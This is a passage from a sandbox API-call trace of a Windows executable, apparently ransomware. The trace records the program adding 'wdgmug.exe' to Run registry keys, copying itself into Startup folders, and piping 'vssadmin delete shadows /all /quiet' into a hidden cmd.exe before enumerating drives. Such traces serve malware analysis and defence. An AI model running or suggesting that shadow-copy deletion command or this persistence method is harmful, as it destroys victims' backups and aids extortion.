lpNumberOfBytesRead=0x19fd90*=0x17200, lpOverlapped=0x0) returned 1 [0279.751] WriteFile (in: hFile=0x244, lpBuffer=0x2394020*, nNumberOfBytesToWrite=0x17200, lpNumberOfBytesWritten=0x19fd90, lpOverlapped=0x0 | out: lpBuffer=0x2394020*, lpNumberOfBytesWritten=0x19fd90*=0x17200, lpOverlapped=0x0) returned 1 [0279.755] ReadFile (in: hFile=0x240, lpBuffer=0x2394020, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x19fd90, lpOverlapped=0x0 | out: lpBuffer=0x2394020*, lpNumberOfBytesRead=0x19fd90*=0x0, lpOverlapped=0x0) returned 1 [0279.755] CloseHandle (hObject=0x244) returned 1 [0279.758] CloseHandle (hObject=0x240) returned 1 [0279.758] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x10) returned 0x4b3300 [0279.758] RtlReAllocateHeap (Heap=0x470000, Flags=0x0, Ptr=0x4b3300, Size=0x20) returned 0x4adbd8 [0279.758] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x10) returned 0x4b3360 [0279.758] RtlReAllocateHeap (Heap=0x470000, Flags=0x0, Ptr=0x4b3360, Size=0x20) returned 0x4ada70 [0279.758] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x77a50000 [0279.758] GetProcAddress (hModule=0x77a50000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x77a66b30 [0279.758] Wow64DisableWow64FsRedirection (in: OldValue=0x19fd94 | out: OldValue=0x19fd94*=0x1) returned 1 [0279.758] lstrlenW (lpString="kernel32.dll") returned 12 [0279.758] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4ada70 | out: hHeap=0x470000) returned 1 [0279.758] lstrlenA (lpString="Wow64DisableWow64FsRedirection") returned 30 [0279.758] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4adbd8 | out: hHeap=0x470000) returned 1 [0279.759] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x2394020 | out: hHeap=0x470000) returned 1 [0279.765] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x10) returned 0x4b3288 [0279.765] RtlReAllocateHeap (Heap=0x470000, Flags=0x0, Ptr=0x4b3288, Size=0x20) returned 0x4ada48 [0279.765] RtlReAllocateHeap (Heap=0x470000, Flags=0x0, Ptr=0x4ada48, Size=0x40) returned 0x487790 [0279.765] RtlReAllocateHeap (Heap=0x470000, Flags=0x0, Ptr=0x487790, Size=0x80) returned 0x4b39c8 [0279.765] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Roaming\\wdgmug.exe") returned 42 [0279.765] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Run") returned 45 [0279.765] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x5c) returned 0x4b3078 [0279.765] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Run", ulOptions=0x0, samDesired=0x20106, phkResult=0x19fd64 | out: phkResult=0x19fd64*=0x240) returned 0x0 [0279.766] RegSetValueExW (hKey=0x240, lpValueName="wdgmug.exe", Reserved=0x0, dwType=0x1, lpData=0x4b6f70, cbData=0x54) returned 0x5 [0279.766] RegCloseKey (hKey=0x240) returned 0x0 [0279.766] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4b3078 | out: hHeap=0x470000) returned 1 [0279.766] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Roaming\\wdgmug.exe") returned 42 [0279.766] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Run") returned 45 [0279.766] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x5c) returned 0x4b3078 [0279.766] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Run", ulOptions=0x0, samDesired=0x20106, phkResult=0x19fd64 | out: phkResult=0x19fd64*=0x244) returned 0x0 [0279.768] RegSetValueExW (in: hKey=0x244, lpValueName="wdgmug.exe", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\FD1HVy\\AppData\\Roaming\\wdgmug.exe", cbData=0x54 | out: lpData="C:\\Users\\FD1HVy\\AppData\\Roaming\\wdgmug.exe") returned 0x0 [0279.768] RegCloseKey (hKey=0x244) returned 0x0 [0279.768] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4b3078 | out: hHeap=0x470000) returned 1 [0279.768] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Run") returned 45 [0279.768] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4b39c8 | out: hHeap=0x470000) returned 1 [0279.768] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xfffe) returned 0x4d6f80 [0279.769] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xfffe) returned 0x4e6f88 [0279.769] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x10) returned 0x4b31f8 [0279.769] RtlReAllocateHeap (Heap=0x470000, Flags=0x0, Ptr=0x4b31f8, Size=0x20) returned 0x4adcc8 [0279.769] RtlReAllocateHeap (Heap=0x470000, Flags=0x0, Ptr=0x4adcc8, Size=0x40) returned 0x487790 [0279.769] RtlReAllocateHeap (Heap=0x470000, Flags=0x0, Ptr=0x487790, Size=0x80) returned 0x4b39c8 [0279.769] RtlReAllocateHeap (Heap=0x470000, Flags=0x0, Ptr=0x4b39c8, Size=0x100) returned 0x4b39c8 [0279.769] lstrlenW (lpString="") returned 0 [0279.769] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders") returned 69 [0279.769] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x8c) returned 0x4b3ad0 [0279.769] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders", ulOptions=0x0, samDesired=0x20119, phkResult=0x19fd10 | out: phkResult=0x19fd10*=0x244) returned 0x0 [0279.769] RegQueryValueExW (in: hKey=0x244, lpValueName="Startup", lpReserved=0x0, lpType=0x19fd1c, lpData=0x4e6f88, lpcbData=0x19fd48*=0x7fff | out: lpType=0x19fd1c*=0x0, lpData=0x4e6f88*=0x53, lpcbData=0x19fd48*=0x7fff) returned 0x2 [0279.769] RegCloseKey (hKey=0x244) returned 0x0 [0279.769] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4b3ad0 | out: hHeap=0x470000) returned 1 [0279.770] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders") returned 69 [0279.770] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x8c) returned 0x4b3ad0 [0279.770] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders", ulOptions=0x0, samDesired=0x20119, phkResult=0x19fd10 | out: phkResult=0x19fd10*=0x244) returned 0x0 [0279.770] RegQueryValueExW (in: hKey=0x244, lpValueName="Startup", lpReserved=0x0, lpType=0x19fd1c, lpData=0x4e6f88, lpcbData=0x19fd48*=0x7fff | out: lpType=0x19fd1c*=0x2, lpData="%USERPROFILE%\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup", lpcbData=0x19fd48*=0x98) returned 0x0 [0279.770] RegCloseKey (hKey=0x244) returned 0x0 [0279.770] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4b3ad0 | out: hHeap=0x470000) returned 1 [0279.770] lstrlenW (lpString="%USERPROFILE%\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup") returned 75 [0279.770] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders") returned 69 [0279.770] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4b39c8 | out: hHeap=0x470000) returned 1 [0279.770] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\wdgmug.exe", lpDst=0x4d6f80, nSize=0x7fff | out: lpDst="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\wdgmug.exe") returned 0x59 [0279.770] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4e6f88 | out: hHeap=0x470000) returned 1 [0279.771] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4d6f80 | out: hHeap=0x470000) returned 1 [0279.772] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x100000) returned 0x2391020 [0279.775] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x10) returned 0x4b3378 [0279.775] RtlReAllocateHeap (Heap=0x470000, Flags=0x0, Ptr=0x4b3378, Size=0x20) returned 0x4adbd8 [0279.775] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x10) returned 0x4b3360 [0279.775] RtlReAllocateHeap (Heap=0x470000, Flags=0x0, Ptr=0x4b3360, Size=0x20) returned 0x4adc28 [0279.775] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x77a50000 [0279.775] GetProcAddress (hModule=0x77a50000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x77a66b30 [0279.776] Wow64DisableWow64FsRedirection (in: OldValue=0x19fd94 | out: OldValue=0x19fd94*=0x1) returned 1 [0279.776] lstrlenW (lpString="kernel32.dll") returned 12 [0279.776] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4adbd8 | out: hHeap=0x470000) returned 1 [0279.776] lstrlenA (lpString="Wow64DisableWow64FsRedirection") returned 30 [0279.776] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4adc28 | out: hHeap=0x470000) returned 1 [0279.776] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\wdgmug.exe" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\startup\\wdgmug.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x244 [0279.776] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\wdgmug.exe" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\startup\\wdgmug.exe"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x248 [0279.777] ReadFile (in: hFile=0x244, lpBuffer=0x2391020, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x19fd90, lpOverlapped=0x0 | out: lpBuffer=0x2391020*, lpNumberOfBytesRead=0x19fd90*=0x17200, lpOverlapped=0x0) returned 1 [0279.793] WriteFile (in: hFile=0x248, lpBuffer=0x2391020*, nNumberOfBytesToWrite=0x17200, lpNumberOfBytesWritten=0x19fd90, lpOverlapped=0x0 | out: lpBuffer=0x2391020*, lpNumberOfBytesWritten=0x19fd90*=0x17200, lpOverlapped=0x0) returned 1 [0279.796] ReadFile (in: hFile=0x244, lpBuffer=0x2391020, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x19fd90, lpOverlapped=0x0 | out: lpBuffer=0x2391020*, lpNumberOfBytesRead=0x19fd90*=0x0, lpOverlapped=0x0) returned 1 [0279.796] CloseHandle (hObject=0x248) returned 1 [0279.804] CloseHandle (hObject=0x244) returned 1 [0279.805] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x10) returned 0x4b3270 [0279.805] RtlReAllocateHeap (Heap=0x470000, Flags=0x0, Ptr=0x4b3270, Size=0x20) returned 0x4adbd8 [0279.805] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x10) returned 0x4b3408 [0279.805] RtlReAllocateHeap (Heap=0x470000, Flags=0x0, Ptr=0x4b3408, Size=0x20) returned 0x4ad9f8 [0279.805] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x77a50000 [0279.805] GetProcAddress (hModule=0x77a50000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x77a66b30 [0279.805] Wow64DisableWow64FsRedirection (in: OldValue=0x19fd94 | out: OldValue=0x19fd94*=0x1) returned 1 [0279.805] lstrlenW (lpString="kernel32.dll") returned 12 [0279.805] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4ad9f8 | out: hHeap=0x470000) returned 1 [0279.805] lstrlenA (lpString="Wow64DisableWow64FsRedirection") returned 30 [0279.805] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4adbd8 | out: hHeap=0x470000) returned 1 [0279.806] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x2391020 | out: hHeap=0x470000) returned 1 [0279.812] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xfffe) returned 0x4d6f80 [0279.813] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xfffe) returned 0x4e6f88 [0279.813] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x10) returned 0x4b3198 [0279.813] RtlReAllocateHeap (Heap=0x470000, Flags=0x0, Ptr=0x4b3198, Size=0x20) returned 0x4adc78 [0279.813] RtlReAllocateHeap (Heap=0x470000, Flags=0x0, Ptr=0x4adc78, Size=0x40) returned 0x487790 [0279.813] RtlReAllocateHeap (Heap=0x470000, Flags=0x0, Ptr=0x487790, Size=0x80) returned 0x4b39c8 [0279.813] RtlReAllocateHeap (Heap=0x470000, Flags=0x0, Ptr=0x4b39c8, Size=0x100) returned 0x4b39c8 [0279.813] lstrlenW (lpString="") returned 0 [0279.813] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders") returned 69 [0279.813] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x8c) returned 0x4b3ad0 [0279.813] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders", ulOptions=0x0, samDesired=0x20119, phkResult=0x19fd10 | out: phkResult=0x19fd10*=0x244) returned 0x0 [0279.813] RegQueryValueExW (in: hKey=0x244, lpValueName="Common Startup", lpReserved=0x0, lpType=0x19fd1c, lpData=0x4e6f88, lpcbData=0x19fd48*=0x7fff | out: lpType=0x19fd1c*=0x2, lpData="%ProgramData%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup", lpcbData=0x19fd48*=0x78) returned 0x0 [0279.813] RegCloseKey (hKey=0x244) returned 0x0 [0279.813] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4b3ad0 | out: hHeap=0x470000) returned 1 [0279.813] lstrlenW (lpString="%ProgramData%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup") returned 59 [0279.813] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders") returned 69 [0279.813] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4b39c8 | out: hHeap=0x470000) returned 1 [0279.814] ExpandEnvironmentStringsW (in: lpSrc="%ProgramData%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\wdgmug.exe", lpDst=0x4d6f80, nSize=0x7fff | out: lpDst="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\wdgmug.exe") returned 0x48 [0279.814] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4e6f88 | out: hHeap=0x470000) returned 1 [0279.814] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4d6f80 | out: hHeap=0x470000) returned 1 [0279.815] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x100000) returned 0x2395020 [0279.818] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x10) returned 0x4b31e0 [0279.819] RtlReAllocateHeap (Heap=0x470000, Flags=0x0, Ptr=0x4b31e0, Size=0x20) returned 0x4adb38 [0279.819] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x10) returned 0x4b33a8 [0279.819] RtlReAllocateHeap (Heap=0x470000, Flags=0x0, Ptr=0x4b33a8, Size=0x20) returned 0x4ad9d0 [0279.819] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x77a50000 [0279.819] GetProcAddress (hModule=0x77a50000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x77a66b30 [0279.819] Wow64DisableWow64FsRedirection (in: OldValue=0x19fd94 | out: OldValue=0x19fd94*=0x1) returned 1 [0279.819] lstrlenW (lpString="kernel32.dll") returned 12 [0279.819] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4adb38 | out: hHeap=0x470000) returned 1 [0279.819] lstrlenA (lpString="Wow64DisableWow64FsRedirection") returned 30 [0279.819] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4ad9d0 | out: hHeap=0x470000) returned 1 [0279.819] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\wdgmug.exe" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\startup\\wdgmug.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x244 [0279.819] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\wdgmug.exe" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\startup\\wdgmug.exe"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0279.820] CloseHandle (hObject=0x244) returned 1 [0279.820] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x10) returned 0x4b32e8 [0279.820] RtlReAllocateHeap (Heap=0x470000, Flags=0x0, Ptr=0x4b32e8, Size=0x20) returned 0x4ad9a8 [0279.820] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x10) returned 0x4b32a0 [0279.820] RtlReAllocateHeap (Heap=0x470000, Flags=0x0, Ptr=0x4b32a0, Size=0x20) returned 0x4adc28 [0279.820] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x77a50000 [0279.820] GetProcAddress (hModule=0x77a50000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x77a66b30 [0279.820] Wow64DisableWow64FsRedirection (in: OldValue=0x19fd94 | out: OldValue=0x19fd94*=0x1) returned 1 [0279.820] lstrlenW (lpString="kernel32.dll") returned 12 [0279.820] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4adc28 | out: hHeap=0x470000) returned 1 [0279.820] lstrlenA (lpString="Wow64DisableWow64FsRedirection") returned 30 [0279.820] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4ad9a8 | out: hHeap=0x470000) returned 1 [0279.821] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x2395020 | out: hHeap=0x470000) returned 1 [0279.824] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4b6f70 | out: hHeap=0x470000) returned 1 [0279.824] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4c6f78 | out: hHeap=0x470000) returned 1 [0279.826] lstrlenW (lpString="%windir%\\System32") returned 17 [0279.826] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4878b0 | out: hHeap=0x470000) returned 1 [0279.826] lstrlenW (lpString="%appdata%") returned 9 [0279.826] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4adac0 | out: hHeap=0x470000) returned 1 [0279.826] lstrlenW (lpString="%sh(Startup)%") returned 13 [0279.826] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4ad980 | out: hHeap=0x470000) returned 1 [0279.826] lstrlenW (lpString="%sh(Common Startup)%") returned 20 [0279.826] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x487748 | out: hHeap=0x470000) returned 1 [0279.826] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x10) returned 0x4b3270 [0279.826] RtlReAllocateHeap (Heap=0x470000, Flags=0x0, Ptr=0x4b3270, Size=0x20) returned 0x4ad980 [0279.826] RtlReAllocateHeap (Heap=0x470000, Flags=0x0, Ptr=0x4ad980, Size=0x40) returned 0x487868 [0279.826] RtlReAllocateHeap (Heap=0x470000, Flags=0x0, Ptr=0x487868, Size=0x80) returned 0x4b39c8 [0279.826] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x10) returned 0x4b3408 [0279.826] RtlReAllocateHeap (Heap=0x470000, Flags=0x0, Ptr=0x4b3408, Size=0x20) returned 0x4ad980 [0279.826] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x1fffc) returned 0x4b6f70 [0279.827] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xfffe) returned 0x4d6f78 [0279.827] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xfffe) returned 0x4e6f80 [0279.828] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x10) returned 0x4b3210 [0279.828] RtlReAllocateHeap (Heap=0x470000, Flags=0x0, Ptr=0x4b3210, Size=0x20) returned 0x4adbd8 [0279.828] RtlReAllocateHeap (Heap=0x470000, Flags=0x0, Ptr=0x4adbd8, Size=0x40) returned 0x4877d8 [0279.828] RtlReAllocateHeap (Heap=0x470000, Flags=0x0, Ptr=0x4877d8, Size=0x80) returned 0x4b3a50 [0279.828] RtlReAllocateHeap (Heap=0x470000, Flags=0x0, Ptr=0x4b3a50, Size=0x100) returned 0x4b3a50 [0279.828] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders") returned 69 [0279.828] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4b3a50 | out: hHeap=0x470000) returned 1 [0279.829] ExpandEnvironmentStringsW (in: lpSrc="%comspec%", lpDst=0x4d6f78, nSize=0x7fff | out: lpDst="C:\\WINDOWS\\system32\\cmd.exe") returned 0x1c [0279.829] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4e6f80 | out: hHeap=0x470000) returned 1 [0279.829] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4d6f78 | out: hHeap=0x470000) returned 1 [0279.831] CreatePipe (in: hReadPipe=0x19fd50, hWritePipe=0x19fd54, lpPipeAttributes=0x19fd40, nSize=0x0 | out: hReadPipe=0x19fd50*=0x248, hWritePipe=0x19fd54*=0x24c) returned 1 [0279.835] CreatePipe (in: hReadPipe=0x19fdc0, hWritePipe=0x19fdc4, lpPipeAttributes=0x19fd40, nSize=0x0 | out: hReadPipe=0x19fdc0*=0x250, hWritePipe=0x19fdc4*=0x254) returned 1 [0279.835] SetHandleInformation (hObject=0x24c, dwMask=0x1, dwFlags=0x0) returned 1 [0279.837] SetHandleInformation (hObject=0x250, dwMask=0x1, dwFlags=0x0) returned 1 [0279.837] CreateProcessW (in: lpApplicationName="C:\\WINDOWS\\system32\\cmd.exe", lpCommandLine=0x0, lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x19fd60*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x101, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x248, hStdOutput=0x254, hStdError=0x254), lpProcessInformation=0x19fdb0 | out: lpCommandLine=0x0, lpProcessInformation=0x19fdb0*(hProcess=0x25c, hThread=0x258, dwProcessId=0xddc, dwThreadId=0xde0)) returned 1 [0279.919] lstrlenA (lpString="mode con cp select=1251\nvssadmin delete shadows /all /quiet\nExit\n") returned 65 [0279.919] WriteFile (in: hFile=0x24c, lpBuffer=0x4b39c8*, nNumberOfBytesToWrite=0x41, lpNumberOfBytesWritten=0x19fd5c, lpOverlapped=0x0 | out: lpBuffer=0x4b39c8*, lpNumberOfBytesWritten=0x19fd5c*=0x41, lpOverlapped=0x0) returned 1 [0279.919] CloseHandle (hObject=0x25c) returned 1 [0279.919] CloseHandle (hObject=0x258) returned 1 [0279.919] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4b6f70 | out: hHeap=0x470000) returned 1 [0279.920] lstrlenA (lpString="mode con cp select=1251\nvssadmin delete shadows /all /quiet\nExit\n") returned 65 [0279.920] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4b39c8 | out: hHeap=0x470000) returned 1 [0279.920] lstrlenW (lpString="%comspec%") returned 9 [0279.920] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4ad980 | out: hHeap=0x470000) returned 1 [0279.920] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x40a530, lpParameter=0x0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x258 [0279.921] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xc) returned 0x4b31b0 [0279.921] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x40a710, lpParameter=0x4b31b0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x25c [0279.921] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x8) returned 0x4ae208 [0279.921] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x4098e0, lpParameter=0x4ae208, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x264 [0279.922] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x10) returned 0x4b3348 [0279.922] RtlReAllocateHeap (Heap=0x470000, Flags=0x0, Ptr=0x4b3348, Size=0x20) returned 0x4ada70 [0279.922] RtlReAllocateHeap (Heap=0x470000, Flags=0x0, Ptr=0x4ada70, Size=0x40) returned 0x487790 [0279.922] lstrlenW (lpString="ABCDEFGHIJKLMNOPQRSTUVWXYZ") returned 26 [0279.922] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xd0) returned 0x48bca8 [0279.922] GetLogicalDrives () returned 0x4 [0279.922] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x10014) returned 0x4b6f70 [0279.922] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x10) returned 0x4b33d8 [0279.923] RtlReAllocateHeap (Heap=0x470000, Flags=0x0, Ptr=0x4b33d8, Size=0x20) returned 0x4ad8b8 [0279.923] RtlReAllocateHeap (Heap=0x470000, Flags=0x0, Ptr=0x4ad8b8, Size=0x40) returned 0x487a60 [0279.923] RtlReAllocateHeap (Heap=0x470000, Flags=0x0, Ptr=0x487a60, Size=0x80) returned 0x4b39c8 [0279.923] RtlReAllocateHeap (Heap=0x470000, Flags=0x0, Ptr=0x4b39c8, Size=0x100) returned 0x4b3ae0 [0279.923] RtlReAllocateHeap (Heap=0x470000, Flags=0x0, Ptr=0x4b3ae0, Size=0x200) returned 0x4b3ae0 [0279.923] RtlReAllocateHeap (Heap=0x470000, Flags=0x0, Ptr=0x4b3ae0, Size=0x400) returned 0x4b3ae0 [0279.923] RtlReAllocateHeap (Heap=0x470000, Flags=0x0, Ptr=0x4b3ae0, Size=0x800) returned 0x4b5280 [0279.923] RtlReAllocateHeap (Heap=0x470000, Flags=0x0, Ptr=0x4b5280, Size=0x1000) returned 0x4b5280 [0279.923] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x10000) returned 0x4c6f90 [0279.923] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x10) returned 0x4b3348 [0279.923] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xc) returned 0x4b3198 [0279.923] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x4) returned 0x4ae118 [0279.923] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xc) returned 0x4b3360 [0279.923] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x4) returned 0x4ae168 [0279.923] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xa) returned 0x4b3138 [0279.923] RtlReAllocateHeap (Heap=0x470000, Flags=0x0, Ptr=0x4ae168, Size=0x8) returned 0x4ae0d8 [0279.923] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xa) returned 0x4b3378 [0279.923] RtlReAllocateHeap (Heap=0x470000, Flags=0x0, Ptr=0x4ae0d8, Size=0x10) returned 0x4b3408 [0279.923] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xa) returned 0x4b33a8 [0279.923] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xa) returned 0x4b33d8 [0279.923] RtlReAllocateHeap (Heap=0x470000, Flags=0x0, Ptr=0x4b3408, 